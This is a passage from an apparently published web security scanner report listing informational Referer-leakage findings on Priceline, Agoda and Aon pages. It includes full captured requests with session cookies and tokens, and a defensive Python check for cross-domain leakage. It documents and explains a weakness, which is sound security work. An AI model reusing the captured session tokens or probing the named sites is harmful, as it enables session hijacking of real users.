<li class="sprite-ec_sm"><a href="http://www.allhotels.com.ec/" title="Ecuador">Ecuador</a></li>
<li class="sprite-fr_sm"><a href="http://www.fr.lastminute.com/site/voyages/reservation-hotels/" title="France">France</a></li>
<li class="sprite-de_sm"><a href="http://www.lastminute.de/de_DE/lmn2/travel/hotel/new.do" title="Germany">Germany</a></li>
<li class="sprite-hk_sm"><a href="http://www.zuji.com.hk/site/travel/hotels/" title="Hong Kong">Hong Kong</a>
...[SNIP]...
<li class="sprite-ie_sm"><a href="http://www.lastminute.ie/site/travel/hotels/" title="Ireland">Ireland</a></li>
<li class="sprite-it_sm"><a href="http://www.it.lastminute.com/site/viaggi/hotels/" title="Italy">Italy</a></li>
<li class="sprite-kp_sm"><a href="http://www.nextour.co.kr/" title="Korea">Korea</a>
...[SNIP]...
<li class="sprite-no_sm"><a href="http://www.reisefeber.no/no/hotel/" title="Norway">Norway</a></li>
<li class="sprite-py_sm"><a href="http://www.allhotels.com.py/" title="Paraguay">Paraguay</a></li>
<li class="sprite-pe_sm"><a href="http://www.allhotels.pe/" title="Peru">Peru</a></li>
<li class="sprite-sg_sm"><a href="http://www.zuji.com.sg/site/travel/hotels/" title="Singapore">Singapore</a></li>
<li class="sprite-es_sm"><a href="http://www.es.lastminute.com/site/viajes/hoteles/" title="Spain">Spain</a></li>
<li class="sprite-se_sm"><a href="http://www.resfeber.se/se/hotel/" title="Sweden">Sweden</a>
...[SNIP]...
<li class="sprite-uy_sm"><a href="http://www.allhotels.com.uy/" title="Uruguay">Uruguay</a></li>
<li class="sprite-ve_sm last"><a href="http://www.allhotels.co.ve/" title="Venezuela">Venezuela</a>
...[SNIP]...
<li class="first"><a href="http://www.allhotels.com/" title="All Hotels">All Hotels</a>
...[SNIP]...
<li><a href="http://www.holidayautos.co.uk/" title="holiday autos">holiday autos</a>
...[SNIP]...
<li><a href="http://www.igougo.com/" title="IgoUgo&reg;">IgoUgo&reg;</a>
...[SNIP]...
<li><a href="http://www.travelguru.com/" title="Travel Guru">Travel Guru</a>
...[SNIP]...
<li><a href="http://www.vacations.com/" title="Vacations.com">Vacations.com</a>
...[SNIP]...
<li><a href="http://www.windowseatblog.com/" title="Window Seat Blog">Window Seat Blog</a>
...[SNIP]...
<li><a href="http://www.worldchoicetravel.com/" title="World Choice Travel&reg;" rel="nofollow">World Choice Travel&reg;</a>
...[SNIP]...
<li class="last"><a href="http://www.zuji.com/" title="Zuji">Zuji</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=75787&p=irol-news&nyo=0" title="Press Releases">Press Releases</a>
...[SNIP]...
<li><a href="http://www.travelocitybusiness.com" title="Travelocity Business">Travelocity Business</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/tracking_tags_US.js"></script>
...[SNIP]...

19.171. http://travela.priceline.com/hotel/newHotelSearch.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (see the response excerpt below):

Request

POST /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:37 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8F1936C519E8273F266A95D7A4654200; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491027


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<NOSCRIPT>
   <A HREF="http://ad.doubleclick.net/N3102/jump/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=9086217658034619?">
   <IMG SRC="http://ad.doubleclick.net/N3102/ad/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=9086217658034619?" border="0" height="90" width="728" alt=""></A>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">groups</a>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<div class="app">
       <a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=336381998&amp;mt=8" onclick="gf_CallExitTracker('/3v3nt/default/nav_bottom/click/iphoneapp');" target="_blank">
       <img width="98" height="34" border="0" src="/hotel/content/graphics/iphone-badge.gif" alt="available on the App Store"/>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">group travel</a>
...[SNIP]...
<li><a href="http://www.hotelroom.com/">Hotel Room</a>
...[SNIP]...
<li><a href="http://www.comparediscounthotels.com/">Discount Hotels</a>
...[SNIP]...
<li><a href="http://www.airfares.com/">Cheap Airfares</a>
...[SNIP]...
<li><a href="http://www.hotelsbycity.net">Cheap Hotels</a>
...[SNIP]...
<li><a href="http://www.agoda.com">Agoda.com</a>
...[SNIP]...
<li><a href="http://www.booking.com">Booking.com</a>
...[SNIP]...
<li class="last"><a title="MyTravelGuide.com" href="http://www.mytravelguide.com">Travel Guides</a>
...[SNIP]...
<li><a href="http://www.pricelinepartnernetwork.com/">hotel affiliate program</a>
...[SNIP]...
<li><a href="http://www.rentalcars.com/rental-car-affiliate-program/">rental car affiliate program</a>
...[SNIP]...
<div style="float: right; padding-top: 5px;">
       <a href="http://www.facebook.com/priceline.negotiator" target="_blank" title="Follow the Negotiator on Facebook">
           <img alt="" src="/sharedapps/content/graphics/fb_btm_nav.gif" border="0" />
...[SNIP]...
</a>
       &nbsp;
       <a href="http://twitter.com/TheNegotiator" target="_blank" title="Follow the Negotiator on Twitter">
           <img alt="" src="/sharedapps/content/graphics/tw_btm_nav.gif" border="0" />
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

19.172. http://travela.priceline.com/hotel/searchHotels.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain (see the response excerpt below):

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:05 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a2011100300100584c011561872; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A10%3A05&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:10:05 GMT; Path=/
Set-Cookie: JSESSIONID=6F97BAD3EA8636704D7EC7753CCBB4DE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8901
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<NOSCRIPT>
<IMG SRC="http://ad.doubleclick.net/ad/priceline.dart/waitpage_hotel;sz=583x80;ord=123456789?" WIDTH="583" HEIGHT="80" BORDER="0">
</NOSCRIPT>
...[SNIP]...

19.173. http://travela.priceline.com/hotel/searchResults.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (see the response excerpt below):

Request

GET /hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:29 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 464319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<NOSCRIPT>
   <A HREF="http://ad.doubleclick.net/N3102/jump/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=6698044948427484?">
   <IMG SRC="http://ad.doubleclick.net/N3102/ad/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=6698044948427484?" border="0" height="90" width="728" alt=""></A>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">groups</a>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<div class="app">
       <a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=336381998&amp;mt=8" onclick="gf_CallExitTracker('/3v3nt/default/nav_bottom/click/iphoneapp');" target="_blank">
       <img width="98" height="34" border="0" src="/hotel/content/graphics/iphone-badge.gif" alt="available on the App Store"/>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">group travel</a>
...[SNIP]...
<li><a href="http://www.hotelroom.com/">Hotel Room</a>
...[SNIP]...
<li><a href="http://www.comparediscounthotels.com/">Discount Hotels</a>
...[SNIP]...
<li><a href="http://www.airfares.com/">Cheap Airfares</a>
...[SNIP]...
<li><a href="http://www.hotelsbycity.net">Cheap Hotels</a>
...[SNIP]...
<li><a href="http://www.agoda.com">Agoda.com</a>
...[SNIP]...
<li><a href="http://www.booking.com">Booking.com</a>
...[SNIP]...
<li class="last"><a title="MyTravelGuide.com" href="http://www.mytravelguide.com">Travel Guides</a>
...[SNIP]...
<li><a href="http://www.pricelinepartnernetwork.com/">hotel affiliate program</a>
...[SNIP]...
<li><a href="http://www.rentalcars.com/rental-car-affiliate-program/">rental car affiliate program</a>
...[SNIP]...
<div style="float: right; padding-top: 5px;">
       <a href="http://www.facebook.com/priceline.negotiator" target="_blank" title="Follow the Negotiator on Facebook">
           <img alt="" src="/sharedapps/content/graphics/fb_btm_nav.gif" border="0" />
...[SNIP]...
</a>
       &nbsp;
       <a href="http://twitter.com/TheNegotiator" target="_blank" title="Follow the Negotiator on Twitter">
           <img alt="" src="/sharedapps/content/graphics/tw_btm_nav.gif" border="0" />
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

19.174. http://travela.priceline.com/hotel/searchResults.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (see the response excerpt below):

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A33FF447E496BF38ED169D142CD825A3; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<NOSCRIPT>
   <A HREF="http://ad.doubleclick.net/N3102/jump/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=6586420485841045?">
   <IMG SRC="http://ad.doubleclick.net/N3102/ad/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=6586420485841045?" border="0" height="90" width="728" alt=""></A>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">groups</a>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<div class="app">
       <a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=336381998&amp;mt=8" onclick="gf_CallExitTracker('/3v3nt/default/nav_bottom/click/iphoneapp');" target="_blank">
       <img width="98" height="34" border="0" src="/hotel/content/graphics/iphone-badge.gif" alt="available on the App Store"/>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">group travel</a>
...[SNIP]...
<li><a href="http://www.hotelroom.com/">Hotel Room</a>
...[SNIP]...
<li><a href="http://www.comparediscounthotels.com/">Discount Hotels</a>
...[SNIP]...
<li><a href="http://www.airfares.com/">Cheap Airfares</a>
...[SNIP]...
<li><a href="http://www.hotelsbycity.net">Cheap Hotels</a>
...[SNIP]...
<li><a href="http://www.agoda.com">Agoda.com</a>
...[SNIP]...
<li><a href="http://www.booking.com">Booking.com</a>
...[SNIP]...
<li class="last"><a title="MyTravelGuide.com" href="http://www.mytravelguide.com">Travel Guides</a>
...[SNIP]...
<li><a href="http://www.pricelinepartnernetwork.com/">hotel affiliate program</a>
...[SNIP]...
<li><a href="http://www.rentalcars.com/rental-car-affiliate-program/">rental car affiliate program</a>
...[SNIP]...
<div style="float: right; padding-top: 5px;">
       <a href="http://www.facebook.com/priceline.negotiator" target="_blank" title="Follow the Negotiator on Facebook">
           <img alt="" src="/sharedapps/content/graphics/fb_btm_nav.gif" border="0" />
...[SNIP]...
</a>
       &nbsp;
       <a href="http://twitter.com/TheNegotiator" target="_blank" title="Follow the Negotiator on Twitter">
           <img alt="" src="/sharedapps/content/graphics/tw_btm_nav.gif" border="0" />
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

19.175. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /pages/agoda/default/page_AdScript.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain (see the response excerpt below):

Request

GET /pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306&conversionLabel=M6MLCJbtiQIQsuTm1QM&_=1317602266727 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:39:13 GMT
Content-Length: 329
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate


<html xmlns="http://www.w3.org/1999/xhtml">
<head></head>
<body>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/?label=M6MLCJbtiQIQsuTm1QM&guid=ON&script=0" />
</div>
...[SNIP]...
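Every entry in this section reports the same condition: the page was requested with a query string (or, in 19.170, with a jsessionid rewritten into the path) and its response loads scripts, images or links from other domains, so the browser's Referer header hands that URL to those domains when it fetches the resource or the user follows the link. In 19.171 and 19.173 the query parameter jsk carries the same value as the JSessionKey cookie, and in 19.172 session_key matches the PSessKey cookie, while the responses pull scripts from an.tacoda.net and static.atgsvcs.com and images from ad.doubleclick.net. The Python check below is an added example and is not part of the XSS.CX scanner output: given a request URL and a response body it lists the cross-domain targets, resolves scheme-relative URLs such as //static.atgsvcs.com/..., skips javascript: links, and flags URL components that look like session material. The registrable-domain helper and the sensitive-name pattern are heuristics chosen for this example, and the sample body is constructed from fragments of the 19.171 response.

```python
"""Cross-domain Referer leakage check (added example, not part of the scanner output).

Given the URL a page was requested with and its HTML body, list the resources and
links that point at other registrable domains, and report which URL components a
full-URL Referer header would hand to those domains.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit

# Heuristic (assumption): parameter names that usually carry a session or tracking secret.
SENSITIVE_NAME = re.compile(r"sess|jsk|token|key|sid", re.I)
# Servlet containers rewrite the session id into the path when cookies are off (seen in 19.170).
PATH_SESSION = re.compile(r";jsessionid=([^/;?]+)", re.I)


class LinkCollector(HTMLParser):
    """Collect every URL-bearing attribute the browser would follow or fetch."""

    URL_ATTRS = {"a": "href", "img": "src", "script": "src", "link": "href",
                 "iframe": "src", "form": "action"}

    def __init__(self):
        super().__init__()
        self.urls = []  # (tag, raw attribute value)

    def handle_starttag(self, tag, attrs):
        wanted = self.URL_ATTRS.get(tag)  # HTMLParser lower-cases tag and attribute names
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.urls.append((tag, value))


def registrable_domain(host):
    """Last two labels of a hostname (assumption: no public-suffix list, so co.uk-style TLDs are not handled)."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:])


def check_referer_leak(request_url, html):
    """Return what a full-URL Referer from this page would expose to third-party domains."""
    req = urlsplit(request_url)
    params = parse_qsl(req.query, keep_blank_values=True)
    path_session = PATH_SESSION.search(req.path)

    collector = LinkCollector()
    collector.feed(html)

    third_party = []
    for tag, raw in collector.urls:
        absolute = urljoin(request_url, raw)          # resolves "/path" and "//host/path"
        target = urlsplit(absolute)
        if target.scheme not in ("http", "https") or not target.hostname:
            continue                                  # javascript:, mailto:, data: ...
        if registrable_domain(target.hostname) != registrable_domain(req.hostname):
            third_party.append((tag, absolute))

    sensitive = [name for name, _ in params if SENSITIVE_NAME.search(name)]
    if path_session:
        sensitive.append("jsessionid (path)")

    return {
        "query_params": [name for name, _ in params],
        "sensitive": sensitive,
        "third_party": third_party,
        "third_party_hosts": sorted({urlsplit(u).hostname for _, u in third_party}),
        # A full-URL Referer carries path and query, so a query string or a
        # path-embedded session id combined with any third-party target is a leak.
        "leaks": bool(third_party) and bool(params or path_session),
    }


# Constructed sample: the 19.171 request URL and a body stitched from fragments of its response.
SAMPLE_URL = ("http://travela.priceline.com/hotel/newHotelSearch.do"
              "?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y")
SAMPLE_HTML = """
<html><head>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
</head><body>
<NOSCRIPT><IMG SRC="http://ad.doubleclick.net/N3102/ad/priceline.dart/hotel_search_results;sz=728x90;ord=9086217658034619?" border="0"></NOSCRIPT>
<img src="/hotel/content/graphics/iphone-badge.gif" alt="available on the App Store"/>
<a href="http://www.priceline.com/">priceline</a>
<a href="http://www.booking.com">Booking.com</a>
<a href="javascript:print();">print</a>
</body></html>
"""

if __name__ == "__main__":
    result = check_referer_leak(SAMPLE_URL, SAMPLE_HTML)
    print("leaks:", result["leaks"])
    print("sensitive URL components:", result["sensitive"])
    for tag, url in result["third_party"]:
        print(f"  <{tag}> -> {url}")
```

Run against the sample, the check reports four third-party hosts and flags jsk; run against the 19.170 URL it flags the path-embedded jsessionid even though the query string itself holds nothing sensitive. Two caveats apply. Browsers at the time of this report sent the full URL in the Referer; current browsers default to Referrer-Policy strict-origin-when-cross-origin, which trims the path and query from cross-origin requests, so the exposure modelled here now depends on the page relaxing that policy (no-referrer-when-downgrade or unsafe-url) or on older clients. And the durable fix is to keep session identifiers out of the URL altogether: a Referrer-Policy header or rel="noreferrer" on links limits what third parties receive, but the token is still written to the address bar, browser history and any proxy log along the way.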

19.176. http://www.aon.com/site/search.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (see the response excerpt below):

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
